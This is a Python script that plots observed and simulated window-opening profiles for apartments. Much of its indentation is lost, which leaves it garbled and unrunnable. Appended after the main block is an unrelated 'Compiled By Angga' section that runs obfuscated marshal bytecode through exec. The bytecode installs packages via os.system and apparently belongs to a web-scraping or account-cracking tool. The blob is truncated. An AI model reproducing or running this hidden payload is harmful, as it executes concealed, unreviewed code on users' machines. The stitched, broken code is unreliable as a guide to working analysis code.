def readDF(df1=pd.DataFrame(), df2=pd.DataFrame(), df3=pd.DataFrame(), df4=pd.DataFrame(), df5=pd.DataFrame(), df6=pd.DataFrame(), level0='ATR', level1='Standard Diurnal', level2='MD', level3='B2E1', level4='A01', level5='Room_Living', level6="WP1"):
    levels = [level0, level1, level2, level3, level4, level5, level6]
    print(levels)

    def selectLevels(df):
        # Narrow the MultiIndex columns to the requested value on each
        # level; a level set to None is left unfiltered.
        if df.empty:
            return df
        for levelNr, level in enumerate(levels):
            if level is not None:
                df = df.iloc[:, df.columns.get_level_values(levelNr) == level]
        return df

    df1, df2, df3, df4, df5, df6 = [selectLevels(df) for df in (df1, df2, df3, df4, df5, df6)]
    print("Cols: {}".format(df1.columns))
    print("End of readDF")
    return df1, df2, df3, df4, df5, df6
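readDF narrows each DataFrame column-by-column over the MultiIndex levels. A small self-contained sketch of that filtering step (the two-level toy column index below is an assumption for illustration; the real frames carry seven levels):

```python
import pandas as pd

def select_levels(df, levels):
    # Keep only the columns whose MultiIndex value matches the requested
    # level; None leaves that level unfiltered (same logic as readDF).
    for levelNr, level in enumerate(levels):
        if level is not None:
            df = df.iloc[:, df.columns.get_level_values(levelNr) == level]
    return df

columns = pd.MultiIndex.from_tuples(
    [("ATR", "MD"), ("ATR", "SD"), ("T1", "MD")])
toy = pd.DataFrame([[1, 2, 3]], columns=columns)
narrowed = select_levels(toy, ["ATR", "MD"])
print(narrowed.columns.tolist())  # [('ATR', 'MD')]
```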
def plotDiurnal(df,df2, labels=[],levels=[],timeType='Standard Diurnal',dataType='MD',title=None,colors=None):
# Column levels 0-6 correspond to: levels[0], timeType, dataType,
# levels[1], levels[2], levels[3], levels[4].
selectors = [levels[0], timeType, dataType, levels[1], levels[2], levels[3], levels[4]]
for colLevel, value in enumerate(selectors):
    if value is not None:
        df = df.iloc[:, df.columns.get_level_values(colLevel) == value]
        df2 = df2.iloc[:, df2.columns.get_level_values(colLevel) == value]
fig = plt.figure(figsize=(16./2.54, 10/2.54))
fig.subplots_adjust(left=0.1)
gs1 = gridspec.GridSpec(1, 1)
#ax = plt.subplot(gs1[0, :])
ax = plt.axes([0.1, 0.1, .85, .8])
for index,column in enumerate(df.columns.values):
if index!=10: ax.plot(df.index, df[column], colors[index], linewidth=2.0,label=labels[index],alpha=0.4)
for index,column in enumerate(df2.columns.values):
if index!=10: ax.plot(df.index, df2[column], colors[index], marker="x", linewidth=0.7,markevery=60,mfc='None', mec=colors[index],label=labels[index]+' Sim')
ax.set_ylabel("Proportion of windows open")
ax.set_xlabel("Time of the day")
ticks = ax.get_xticks()
ax.set_ylim(0,1)
plt.title(title, y=1.05)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.32,
box.width, box.height * 0.68])
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))
ax.legend(loc='upper center', bbox_to_anchor=(0.475, -0.2),frameon=False, ncol=3)
plt.show()
def plotBoxes(df,df2, labels=[],levels=[],title=None,colors=None, savingFolder="", extraName=""):
fig2= plt.figure(figsize=(16./2.54, 8/2.54))
fig2.subplots_adjust(left=0.1)
#gs2 = gridspec.GridSpec(1, 1)
#ax2 = fig2.add_subplot(gs2[0, :])
ax2 = fig2.add_axes([0.13, 0.355, .85, .55])
#plt.title(title, y=1.05)
bp = ax2.boxplot(df2.values-df.values, sym='-', vert=True, whis=1.5)#, linewidth=2.0,label=labels[index],alpha=0.4)
# Now fill the boxes with desired colors
boxColors = colors
bisColors = [a for a in colors for i in range(2)]
numBoxes = 6
medians = [0] * numBoxes
meanValues=DataFrame(df2.values-df.values).mean(axis=0).values
meanAbsResiduals=DataFrame(abs(df2.values-df.values)).mean(axis=0).values
for i in range(numBoxes):
box = bp['boxes'][i]
boxY = []
boxX = []
for j in range(5):
boxX.append(box.get_xdata()[j])
boxY.append(box.get_ydata()[j])
boxCoords = list(zip(boxX, boxY))
boxPolygon = Polygon(boxCoords, facecolor=boxColors[i], alpha=0.1,zorder=1)
ax2.add_patch(boxPolygon)
# Now draw the median lines back over what we just filled in
med = bp['medians'][i]
medianX = []
medianY = []
for j in range(2):
medianX.append(med.get_xdata()[j])
medianY.append(med.get_ydata()[j])
plt.plot(medianX, medianY, boxColors[i],linewidth=2)
medians[i] = medianY[0]
# Finally, overplot the sample averages, with horizontal alignment
# in the center of each box
plt.plot([np.average(med.get_xdata())], meanValues[i],
color='None', marker='o', markeredgecolor=boxColors[i], markersize=7,zorder=0)
plt.plot([np.average(med.get_xdata())], meanValues[i],
color=boxColors[i], marker='o', markeredgecolor=boxColors[i], markersize=7,alpha=0.2,zorder=3)
plt.setp(bp['medians'][i], color=colors[i]) # DarkSlateGray
plt.setp(bp['boxes'][i], color='DarkSlateGray')
for i in range(len(bisColors)):
plt.setp(bp['whiskers'][i], color='DarkSlateGray')
plt.setp(bp['caps'][i], color='DarkSlateGray')
plt.setp(bp['fliers'], color='Gainsboro')
plt.setp(bp['whiskers'], linestyle='solid')
ax2.set_ylabel("Simulated-Observed WP profile")
# ax2.set_ylabel("Simulated-Observed WS")
ax2.yaxis.set_label_coords(-0.09, 0.5)
ax2.set_ylim(-0.02,0.02)
#ax2.set_yticks([0.2, 0.6, 0.8], minor=False)
ax2.yaxis.set_ticks_position('left')
ax2.xaxis.set_ticks_position('bottom')
#newLabels= ["ATR",'DAT $\leq$ 5'," 5 $\leq$ \nDAT\n $\leq$ 11", "11 $\leq$ \nDAT\n $\leq$ 14","14 $\leq$ \nDAT\n $\leq$ 18","DAT $\geq$ 18"]
xtickNames = plt.setp(ax2, xticklabels=labels)
plt.setp(xtickNames,rotation=30)#, fontsize=8
ax2.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
ax2.xaxis.grid(False)
ax2.set_axisbelow(True)
title=str(np.char.replace(title," ", '_'))
title=str(np.char.replace(title,"Apartment", 'Ap'))
fig2.savefig(savingFolder + title + '_BP.png', format='png')
fig2.savefig(savingFolder + title + '_BP.pdf', format='pdf')
#plt.show()
def plotDiurnalandBoxes(df,df2, labels=[],levels=[],timeType='Standard Diurnal',dataType='MD',title=None,colors=None, savingFolder="", extraName=""):
print (levels)
if levels[1] == "B2E3" and levels[2] == 'A03' and levels[3] == 'Room_Kitchen':
    return np.empty(6) * np.nan, str(levels), np.empty(6) * np.nan
else:
oldtitle=title
title=desmountTitle(title, extraName)
name=buildName(oldtitle, extraName)
if timeType!='Standard Diurnal':
title=timeType+' - '+ title
name=timeType+' - '+ name
# Column levels 0-6 correspond to: levels[0], timeType, dataType,
# levels[1], levels[2], levels[3], levels[4].
selectors = [levels[0], timeType, dataType, levels[1], levels[2], levels[3], levels[4]]
for colLevel, value in enumerate(selectors):
    if value is not None:
        df = df.iloc[:, df.columns.get_level_values(colLevel) == value]
        df2 = df2.iloc[:, df2.columns.get_level_values(colLevel) == value]
print ("WE", df.columns)
print ('We', df2.columns)
fig = plt.figure(figsize=(16./2.54, 10/2.54))
fig.subplots_adjust(left=0.1)
# gs1 = gridspec.GridSpec(1, 1)
# ax = plt.subplot(gs1[0, :])
#ax = fig.add_axes([0.13, 0.1, .85, .8])
ax = fig.add_axes([0.13, 0.355, .85, .55])
for index,column in enumerate(df.columns.values):
if index!=10: ax.plot(df.index, df[column], colors[index], linewidth=2.0,label=labels[index],alpha=0.4)
for index,column in enumerate(df2.columns.values):
if index!=10: ax.plot(df.index, df2[column], colors[index], marker="x", linewidth=0.7,markevery=60,mfc='None', mec=colors[index],label=labels[index]+' Sim')
ax.set_ylabel("Proportion of window open")
ax.yaxis.set_label_coords(-0.09, 0.5)
ax.set_xlabel("Time of the day")
ticks = ax.get_xticks()
ax.set_ylim(0,1)
plt.title(title, y=1.05)
box = ax.get_position()
#ax.set_position([box.x0, box.y0 + box.height * 0.32,
# box.width, box.height * 0.68])
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))
ax.legend(loc='upper center', bbox_to_anchor=(0.475, -0.2),frameon=False, ncol=3)
#ax.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
#ax.xaxis.grid(False)
fig.savefig(savingFolder + name + '.pdf', format='pdf')
fig2= plt.figure(figsize=(16./2.54, 10/2.54))
fig2.subplots_adjust(left=0.1)
#gs2 = gridspec.GridSpec(1, 1)
#ax2 = fig2.add_subplot(gs2[0, :])
ax2 = fig2.add_axes([0.13, 0.355, .85, .55])
plt.title(title, y=1.05)
bp = ax2.boxplot(df2.values-df.values, sym='-', vert=True, whis=1.5)#, linewidth=2.0,label=labels[index],alpha=0.4)
# Now fill the boxes with desired colors
boxColors = colors
bisColors = [a for a in colors for i in range(2)]
numBoxes = 6
medians = [0] * numBoxes
meanValues=DataFrame(df2.values-df.values).mean(axis=0).values
meanAbsResiduals=DataFrame(abs(df2.values-df.values)).mean(axis=0).values
for i in range(numBoxes):
box = bp['boxes'][i]
boxY = []
boxX = []
for j in range(5):
boxX.append(box.get_xdata()[j])
boxY.append(box.get_ydata()[j])
boxCoords = list(zip(boxX, boxY))
boxPolygon = Polygon(boxCoords, facecolor=boxColors[i], alpha=0.1,zorder=1)
ax2.add_patch(boxPolygon)
# Now draw the median lines back over what we just filled in
med = bp['medians'][i]
medianX = []
medianY = []
for j in range(2):
medianX.append(med.get_xdata()[j])
medianY.append(med.get_ydata()[j])
plt.plot(medianX, medianY, boxColors[i],linewidth=2)
medians[i] = medianY[0]
# Finally, overplot the sample averages, with horizontal alignment
# in the center of each box
plt.plot([np.average(med.get_xdata())], meanValues[i],
color='None', marker='o', markeredgecolor=boxColors[i], markersize=7,zorder=0)
plt.plot([np.average(med.get_xdata())], meanValues[i],
color=boxColors[i], marker='o', markeredgecolor=boxColors[i], markersize=7,alpha=0.2,zorder=3)
plt.setp(bp['medians'][i], color=colors[i]) # DarkSlateGray
plt.setp(bp['boxes'][i], color='DarkSlateGray')
for i in range(len(bisColors)):
plt.setp(bp['whiskers'][i], color='DarkSlateGray')
plt.setp(bp['caps'][i], color='DarkSlateGray')
plt.setp(bp['fliers'], color='Gainsboro')
plt.setp(bp['whiskers'], linestyle='solid')
ax2.set_ylabel("Simulated-Observed WP profile")
ax2.yaxis.set_label_coords(-0.09, 0.5)
ax2.set_ylim(-0.1,0.1)
#ax2.set_yticks([0.2, 0.6, 0.8], minor=False)
ax2.yaxis.set_ticks_position('left')
ax2.xaxis.set_ticks_position('bottom')
#newLabels= ["ATR",'DAT $\leq$ 5'," 5 $\leq$ \nDAT\n $\leq$ 11", "11 $\leq$ \nDAT\n $\leq$ 14","14 $\leq$ \nDAT\n $\leq$ 18","DAT $\geq$ 18"]
xtickNames = plt.setp(ax2, xticklabels=labels)
plt.setp(xtickNames,rotation=30)#, fontsize=8
ax2.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
ax2.xaxis.grid(False)
ax2.set_axisbelow(True)
fig2.savefig(savingFolder + title + '_BP.pdf', format='pdf')
#plt.show()
return meanValues, str(levels), meanAbsResiduals
def plotDiurnalandBoxesBeta(df,df2, labels=[],levels=[],timeType='Standard Diurnal',dataType='MD',title=None,colors=None, savingFolder="", extraName=""):
print (levels)
if levels[1] == "B2E3" and levels[2] == 'A03' and levels[3] == 'Room_Kitchen':
return np.empty(6) * np.nan, str(levels)
else:
oldtitle=title
title=desmountTitle(title, extraName)
name=buildName(oldtitle, extraName)
if timeType!='Standard Diurnal':
title=timeType+' - '+ title
name=timeType+' - '+ name
# Column levels 0-6 correspond to: levels[0], timeType, dataType,
# levels[1], levels[2], levels[3], levels[4].
selectors = [levels[0], timeType, dataType, levels[1], levels[2], levels[3], levels[4]]
for colLevel, value in enumerate(selectors):
    if value is not None:
        df = df.iloc[:, df.columns.get_level_values(colLevel) == value]
        df2 = df2.iloc[:, df2.columns.get_level_values(colLevel) == value]
fig = plt.figure(figsize=(16./2.54, 9/2.54))
fig.subplots_adjust(left=0.1)
# gs1 = gridspec.GridSpec(1, 1)
# ax = plt.subplot(gs1[0, :])
#ax = fig.add_axes([0.13, 0.1, .85, .8])
ax = fig.add_axes([0.13, 0.4, .85, .5])
for index,column in enumerate(df.columns.values):
if index!=10: ax.plot(df.index, df[column], colors[index], linewidth=2.0,label=labels[index],alpha=0.4)
for index,column in enumerate(df2.columns.values):
if index!=10: ax.plot(df.index, df2[column], colors[index], marker="x", linewidth=0.7,markevery=60,mfc='None', mec=colors[index],label=labels[index]+' Sim')
    # The y-axis label depends on the diurnal type (SD / WE / WD).
    if timeType == 'Standard Diurnal':
        ax.set_ylabel("SD - Aver. WS, " + str(title.split(", ")[1]))
    if timeType == 'Week End':
        ax.set_ylabel("WE - Aver. WS, " + str(title.split(", ")[1]))
    if timeType == 'Week':
        ax.set_ylabel("WD - Aver. WS, " + str(title.split(", ")[1]))
    ax.yaxis.set_label_coords(-0.09, 0.5)
    ax.set_xlabel("Time of the day")
    ax.set_ylim(0, 1)
    ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))
    ax.legend(loc='upper center', bbox_to_anchor=(0.475, -0.25),
              frameon=False, ncol=3)
    # Build a file-system-safe name from the title.
    titleb = title.replace(" ", '').replace(",", '_')
    fig.savefig(savingFolder + titleb + '.pdf', format='pdf')
    fig2 = plt.figure(figsize=(16. / 2.54, 9. / 2.54))
    fig2.subplots_adjust(left=0.1)
    ax2 = fig2.add_axes([0.13, 0.4, .85, .5])
    # Box plot of the simulated-minus-observed residuals per column.
    bp = ax2.boxplot(df2.values - df.values, sym='-', vert=True, whis=1.5)
    # Fill the boxes with the series colours.
    boxColors = colors
    bisColors = [a for a in colors for i in range(2)]  # whiskers/caps come in pairs
    numBoxes = 6
    medians = [None] * numBoxes  # a list, so the items can be assigned below
    meanValues = DataFrame(df2.values - df.values).mean(axis=0).values
    meanAbsResiduals = DataFrame(abs(df2.values - df.values)).mean(axis=0).values
    for i in range(numBoxes):
        box = bp['boxes'][i]
        boxX = [box.get_xdata()[j] for j in range(5)]
        boxY = [box.get_ydata()[j] for j in range(5)]
        boxCoords = list(zip(boxX, boxY))  # list() so this also works on Python 3
        boxPolygon = Polygon(boxCoords, facecolor=boxColors[i], alpha=0.1, zorder=1)
        ax2.add_patch(boxPolygon)
        # Redraw the median line over the filled box.
        med = bp['medians'][i]
        medianX = [med.get_xdata()[j] for j in range(2)]
        medianY = [med.get_ydata()[j] for j in range(2)]
        plt.plot(medianX, medianY, boxColors[i], linewidth=2)
        medians[i] = medianY[0]
        # Overplot the sample mean, horizontally centred on each box.
        plt.plot([np.average(med.get_xdata())], meanValues[i],
                 color='None', marker='o', markeredgecolor=boxColors[i],
                 markersize=7, zorder=0)
        plt.plot([np.average(med.get_xdata())], meanValues[i],
                 color=boxColors[i], marker='o', markeredgecolor=boxColors[i],
                 markersize=7, alpha=0.2, zorder=3)
        plt.setp(bp['medians'][i], color=colors[i])
        plt.setp(bp['boxes'][i], color='DarkSlateGray')
    for i in range(len(bisColors)):
        plt.setp(bp['whiskers'][i], color='DarkSlateGray')
        plt.setp(bp['caps'][i], color='DarkSlateGray')
    plt.setp(bp['fliers'], color='Gainsboro')
    plt.setp(bp['whiskers'], linestyle='solid')
    # The generic residual label is used for every diurnal type (the original
    # per-type labels were unconditionally overwritten by this line).
    ax2.set_ylabel("Sim.-Obs. WS, " + str(title.split(", ")[1]))
    ax2.yaxis.set_label_coords(-0.09, 0.5)
    ax2.set_ylim(-0.1, 0.1)
    ax2.yaxis.set_ticks_position('left')
    ax2.xaxis.set_ticks_position('bottom')
    xtickNames = plt.setp(ax2, xticklabels=labels)
    plt.setp(xtickNames, rotation=30)
    ax2.yaxis.grid(True, zorder=0, color="Gainsboro", ls="-")
    ax2.xaxis.grid(False)
    ax2.set_axisbelow(True)
    title = title.replace(" ", '').replace(",", '_')
    fig2.savefig(savingFolder + title + '_BP.pdf', format='pdf')
    return meanValues, str(levels), meanAbsResiduals
def desmountTitle(title, startTitle):
    """Join the title parts into 'startTitle - part1, part2, ...lastPart'.

    Note: the element at index 0 only switches the separator on; its own
    value is never appended (behaviour kept from the original).
    """
    newTitle = startTitle
    for i, word in enumerate(title):
        if i == len(title) - 1:
            newTitle = newTitle + str(word)
        elif i == 0:
            newTitle = startTitle + ' - '
        else:
            newTitle = newTitle + str(word) + ', '
    return newTitle


def buildName(title, startTitle):
    """Like desmountTitle, but with '_' separators for use in file names."""
    newTitle = startTitle
    for i, word in enumerate(title):
        if i == len(title) - 1:
            newTitle = newTitle + str(word)
        elif i == 0:
            newTitle = startTitle + '_'
        else:
            newTitle = newTitle + str(word) + '_'
    return newTitle
if __name__ == '__main__':
    print("Start main")
    recordFolder = 'D:/dc224615_Ddiss/Documento/Pictures/MCValidation/B2E1/'
    recFolder = 'D:/EBC0018_PTJ_Volkswohnung_tos/HDF-Programming/pd4hdf/MarkovChain/MC4Windows/records/'
    df1 = pd.read_csv(recFolder + 'diurnals/B2E1_20121_201212diurnals.csv',
                      index_col=0, sep=';', header=[0, 1, 2, 4, 5, 6, 7],
                      skiprows=[8], parse_dates=True, low_memory=False)
    # alternative input: recFolder + 'diurnals3/B2E1_20121_201212diurnals_MD.csv'
    df2 = pd.read_csv(recFolder + 'validationM3_B2E1/proSet_100_B2E1_CDPL.csv',
                      index_col=0, sep=';', header=[0, 1, 2, 4, 5, 6, 7],
                      skiprows=[8], parse_dates=True, low_memory=False)
    roomsWP1 = ['Room_Kitchen', 'Room_Bath', 'Room_Living']
    roomsWP = ['Room_Children', 'Room_Sleeping']
    entrances = ["B2E1"]  # , "B2E2", "B2E3", "B3E1", "B3E2", "B3E3"
    apartments = ["A01", "A02", "A03", "A04", "A05", "A06", "A07", "A08",
                  "A09", "A10"]
    results = []
    indicis = []
    columns4Results = []
    for entrance in entrances:
        for apartment in apartments:
            for room in roomsWP1:
                colors, markers, title, labels, keys = Select_ColorsAndMarkers(
                    Level0=None, Level2=entrance, Level3=apartment,
                    Level4=room, Level5="WP1")
                title, labels = english2English(title, labels)
                keys = codifyL1(keys)
                # plotDiurnalandBoxes returns three values; the mean absolute
                # residuals are not used here.
                values, indice, _ = plotDiurnalandBoxes(
                    df1, df2, levels=keys, labels=labels, title=title,
                    colors=colors, savingFolder=recordFolder, extraName='2012')
                results.append(values)
                indicis.append(indice)
            for room in roomsWP:
                print(entrance, apartment, room)
                colors, markers, title, labels, keys = Select_ColorsAndMarkers(
                    Level0=None, Level2=entrance, Level3=apartment,
                    Level4=room, Level5="WP")
                title, labels = english2English(title, labels)
                keys = codifyL1(keys)
                values, indice, _ = plotDiurnalandBoxes(
                    df1, df2, levels=keys, labels=labels, title=title,
                    colors=colors, savingFolder=recordFolder, extraName='2012')
                results.append(values)
                indicis.append(indice)
                columns4Results = labels
    print(results)
    resultDF = DataFrame(results, index=indicis, columns=columns4Results)
    resultDF.to_csv(recordFolder + "results.csv", sep=';')
    print("end main")
#Compiled By Angga
#Facebook : https://www.facebook.com/PEMUDA.KALEUM
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00@\x00\x00\x00sE\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00y\x10\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00Wn\x1e\x00\x04e\x02\x00k\n\x00r<\x00\x01\x01\x01e\x00\x00j\x03\x00d\x02\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00Wn\x1e\x00\x04e\x02\x00k\n\x00rm\x00\x01\x01\x01e\x00\x00j\x03\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x04\x00l\x0b\x00m\x0c\x00Z\x0c\x00\x01d\x00\x00d\x05\x00l\x04\x00m\r\x00Z\x0e\x00\x01d\x00\x00d\x06\x00l\x0f\x00m\x0f\x00Z\x0f\x00\x01d\x00\x00d\x07\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x08\x00a\x11\x00g\x00\x00Z\x12\x00g\x00\x00Z\x13\x00g\x00\x00Z\x14\x00e\x0f\x00j\x15\x00\x83\x00\x00Z\x16\x00e\x16\x00j\x17\x00Z\x18\x00d\t\x00d\n\x00d\x0b\x00d\x0c\x00d\r\x00d\x0e\x00d\x0f\x00d\x10\x00d\x11\x00d\x12\x00d\x13\x00d\x14\x00g\x0c\x00Z\x19\x00y0\x00e\x18\x00d\x08\x00k\x00\x00s\x80\x01e\x18\x00d\x15\x00k\x04\x00r\x8a\x01e\x1a\x00\x83\x00\x00\x01n\x00\x00e\x18\x00d\x16\x00\x18Z\x1b\x00Wn\x18\x00\x04e\x1c\x00k\n\x00r\xaf\x01\x01\x01\x01e\x1a\x00\x83\x00\x00\x01n\x01\x00Xe\x0f\x00j\x15\x00\x83\x00\x00Z\x1d\x00e\x1d\x00j\x1e\x00Z\x1f\x00e\x1d\x00j\x17\x00Z \x00e\x1d\x00j!\x00Z"\x00e\x19\x00e\x1b\x00\x19Z#\x00d\x17\x00\x84\x00\x00Z$\x00e\x10\x00j%\x00\x83\x00\x00Z&\x00e\n\x00j\'\x00e&\x00j(\x00\x83\x00\x00\x19Z)\x00d\x18\x00e)\x00e"\x00e#\x00e\x1f\x00f\x04\x00\x16Z*\x00d\x19\x00e"\x00e#\x00e\x1f\x00f\x03\x00\x16Z+\x00i\x0c\x00d\t\x00d\x1a\x006d\n\x00d\x1b\x006d\x0b\x00d\x1c\x006d\x0c\x00d\x1d\x006d\r\x00d\x1e\x006d\x0e\x00d\x1f\x006d\x0f\x00d 
\x006d\x10\x00d!\x006d\x11\x00d"\x006d\x12\x00d#\x006d\x13\x00d$\x006d\x14\x00d%\x006Z,\x00d&\x00\x84\x00\x00Z-\x00d\'\x00\x84\x00\x00Z.\x00d(\x00\x84\x00\x00Z/\x00d)\x00\x84\x00\x00Z0\x00d*\x00\x84\x00\x00Z1\x00d+\x00\x84\x00\x00Z2\x00d,\x00\x84\x00\x00Z3\x00d-\x00\x84\x00\x00Z4\x00d.\x00\x84\x00\x00Z5\x00d/\x00\x84\x00\x00Z6\x00d0\x00\x84\x00\x00Z7\x00d1\x00\x84\x00\x00Z8\x00d2\x00\x84\x00\x00Z9\x00d3\x00\x84\x00\x00Z:\x00e;\x00d4\x00k\x02\x00rA\x03e\x00\x00j\x03\x00d5\x00\x83\x01\x00\x01e\x00\x00j\x03\x00d6\x00\x83\x01\x00\x01e:\x00\x83\x00\x00\x01e.\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(7\x00\x00\x00i\xff\xff\xff\xffNs\x15\x00\x00\x00pip2 install requestss\x10\x00\x00\x00pip2 install bs4(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\r\x00\x00\x00BeautifulSoup(\x01\x00\x00\x00t\x08\x00\x00\x00datetime(\x01\x00\x00\x00t\x04\x00\x00\x00datei\x00\x00\x00\x00t\x07\x00\x00\x00Januarit\x08\x00\x00\x00Februarit\x05\x00\x00\x00Marett\x05\x00\x00\x00Aprilt\x03\x00\x00\x00Meit\x04\x00\x00\x00Junit\x04\x00\x00\x00Julit\x07\x00\x00\x00Agustust\t\x00\x00\x00Septembert\x07\x00\x00\x00Oktobert\x08\x00\x00\x00Novembert\x08\x00\x00\x00Desemberi\x0c\x00\x00\x00i\x01\x00\x00\x00c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xa9?(\x06\x00\x00\x00t\x03\x00\x00\x00syst\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00jalan1\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\x0b\x00\x00\x00%s-%s-%s-%ss\x08\x00\x00\x00%s %s 
%st\x02\x00\x00\x0001t\x02\x00\x00\x0002t\x02\x00\x00\x0003t\x02\x00\x00\x0004t\x02\x00\x00\x0005t\x02\x00\x00\x0006t\x02\x00\x00\x0007t\x02\x00\x00\x0008t\x02\x00\x00\x0009t\x02\x00\x00\x0010t\x02\x00\x00\x0011t\x02\x00\x00\x0012c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x00\x00S(\x03\x00\x00\x00Nt\x05\x00\x00\x00clears\x85\x06\x00\x00\x1b[1;97m \n \x1b[1;95m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91 \x1b[1;96m\xe2\x84\xa2 \x1b[1;95m\n \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n 
\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n \x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n 